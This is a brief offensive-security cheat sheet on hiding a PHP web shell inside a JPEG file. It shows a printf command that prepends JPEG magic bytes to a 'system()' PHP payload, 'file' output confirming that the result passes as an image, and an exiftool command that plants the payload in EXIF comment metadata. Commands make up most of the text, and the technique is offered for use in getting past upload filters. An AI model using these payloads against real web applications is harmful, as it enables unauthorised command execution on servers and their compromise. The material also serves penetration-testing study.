Web Shell

If you can upload a jpg file, it is possible to hide a webshell in it.

A jpeg file is identified by its first bytes which have the value: ffd8ffe0
To generate a file that will be identified as having a valid Jpeg header:

printf "\xff\xd8\xff\xe0<?php system('id'); ?>" > webshell.jpg

This file will be recognized as a jpg file

$ file webshell.jpg 
webshell.jpg: JPEG image data

An image file contains a lot of information: shooting date, location, camera type...
We can inject php code in this data.

exiftool -Comment='<?php system('id'); ?>' webshell.jpg